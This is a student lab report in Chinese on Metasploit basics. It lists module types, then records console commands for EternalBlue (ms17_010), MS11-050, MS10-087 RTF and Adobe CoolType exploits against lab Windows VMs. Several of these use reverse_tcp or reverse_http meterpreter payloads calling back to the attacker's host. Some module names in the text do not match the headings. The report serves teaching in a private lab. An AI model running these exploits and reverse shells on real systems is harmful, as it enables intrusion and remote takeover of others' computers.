1. 程式人生 > >2018-2019 20165232 Exp5 MSF基礎應用

2018-2019 20165232 Exp5 MSF基礎應用

enc 自己的 失去 rip 工具 ice 選擇 地址 使用

2018-2019 20165232 Exp5 MSF基礎應用

一.原理與實踐說明

1.實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

  • 一個主動攻擊實踐,如ms08-067; (1分)

  • 一個針對瀏覽器的攻擊,如ms11-050;(1分)

  • 一個針對客戶端的攻擊,如Adobe;(1分)

  • 成功應用任何一個輔助模塊。(0.5分)

以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的,否則扣除0.5分。

2.預備知識

##### 一、MSF的六種模塊

Exploit

模塊
是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而獲得對遠程目標系統訪問權的代碼組件。

形象點來說就是攻擊模塊

Payload

模塊
是在滲透成功後促使目標系統運行的一端植入代碼,通常作用是為滲透攻擊者打開在目標系統上的控制會話連接。實際上,該模塊就是計算機集成的針對不同操作系統實現shellcode攻擊的ruby代碼。

Encoder

模塊
針對payload進行編碼,可以通過多種編碼手段、多次編碼方式有效的改變payload代碼特征
不改變payload作用,但能對payload進行加工

Aux

模塊
能夠幫助滲透測試中在進行滲透攻擊之前得到的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。
主要包括針對各種網絡服務的掃描和查點、構建虛假服務收集登錄密碼、口令猜測破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。

Post

模塊
支持在滲透攻擊取得目標系統遠程控制權之後,在受控系統中進行給各樣的後滲透攻擊動作。
這裏主要指的是攻擊之後可能用到的模塊

Nops

模塊
是一些對程序運行狀態不會造成任何實質影響的空操作或無關操作指令,最典型的空指令就是空操作,在X86 CPU體系架構平臺上的操作碼是0x90
因為有些代碼返回地址很難確認,所以在實際中有時候會填充一大段空指令,便於快速確定返回地址的位置

2.基礎問題

**問:用自己的話解釋什麽是

exploit

,

payload

,

encode

exploit

:測試者利用系統,程序,或服務的漏洞進行攻擊的一個過程。

payload

:攻擊者在目標系統上執行的一段攻擊代碼,該代碼具有返彈連接,創建用戶,執行其他系統命令的功能。

encode

:encode編碼一是為了避免使攻擊載荷不能完整運行的“壞字符”,二是為了改變特征碼,幫助攻擊載荷避免被殺軟發現。

二.實踐過程記錄

1.Windows服務滲透攻擊——ms17_010安全漏洞

①攻擊機:kali

②靶機:windows XP

在攻擊機kali輸入

msfconsole

進入控制臺,依次輸入以下指令:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_netapi) > show payloads
msf exploit(ms17_010_netapi) > set payload windows/x64/meterpreter/reverse_tcp //tcp反向回連
msf exploit(ms17_010_netapi) > set LHOST 192.168.11.128 //攻擊機ip
msf exploit(ms17_010_netapi) > set LPORT 5232 //攻擊端口
msf exploit(ms17_010_netapi) > set RHOST 192.168.11.133 //靶機ip,特定漏洞端口已經固定
msf exploit(ms17_010_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高
msf exploit(ms17_010_netapi) > exploit //攻擊

技術分享圖片

建立會話,攻擊成功結果如下:
技術分享圖片

2.瀏覽器滲透攻擊——MS11-050

①攻擊機:kali

②靶機:WindowsXP Windows7

在攻擊機kali輸入

msfconsole

進入控制臺,依次輸入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回連
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.11.128 //攻擊機ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5232 //攻擊端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 2016hyd //統一資源標識符路徑設置
msf exploit(ms11_050_cobjectelement) > exploit

技術分享圖片

在瀏覽器輸入http://192.168.11.128:8080/2016hyd
技術分享圖片
換成W7仍然不行,於是我手動降低安全級別——在IE瀏覽器打開“工具->Internet選項”,選擇“安全”選項卡,將設置裏面最不安全的全部選上,自定義也設置為最低等級
技術分享圖片
技術分享圖片

仍然不行
技術分享圖片

3.針對Office軟件的滲透攻擊——MS10-087

①攻擊機:kali

②靶機:windowsXP

③Office版本:2003

在攻擊機kali輸入

msfconsole

進入控制臺,依次輸入以下指令:

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec //運行一個可執行文件
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe //綁定計算器程序,進行啟動
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit //攻擊

技術分享圖片
使用

show options

命令查看一些參數值,比如文件名、綁定程序等等。此時文件名為默認,也可以進行修改。
技術分享圖片
將生成的文件從/root/.msf4/local/msf.rft拷貝到靶機上,這裏得在命令行移動文件,否則找不到。
技術分享圖片
技術分享圖片
使用Office2003打開。提示錯誤:
技術分享圖片
雙擊運行,由於綁定到計算器,因此打開了計算器程序,攻擊成功:
技術分享圖片

4.針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

①攻擊機:kali

②靶機:windowsXP

③Adobe版本:9.3

在攻擊機kali輸入msfconsole進入控制臺,依次輸入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.11.128 //攻擊機ip
msf exploit(adobe_cooltype_sing) > set LPORT 5232 //攻擊端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155303-2.pdf //設置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻擊

技術分享圖片
將生成的pdf文件拷貝到靶機上。
技術分享圖片

在kali上輸入back退出當前模塊,進入監聽模塊,輸入以下命令:

msf > use exploit/multi/handler //進入監聽模塊
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向連接
msf exploit(handler) > set LHOST 192.168.11.128 //攻擊機ip
msf exploit(handler) > set LPORT 5232 //攻擊端口固定
msf exploit(handler) > exploit

技術分享圖片
在靶機上打開20155303-2.pdf文件:
技術分享圖片
攻擊機顯示攻擊成功:
技術分享圖片
此時若關閉pdf文件,則失去權限,攻擊失敗:
技術分享圖片

三、問題與思考

問題1:在進行ms08_067_netapi攻擊時出現以下情況
技術分享圖片

  • 解決辦法:攻擊方式太老,換一個攻擊方式。

2018-2019 20165232 Exp5 MSF基礎應用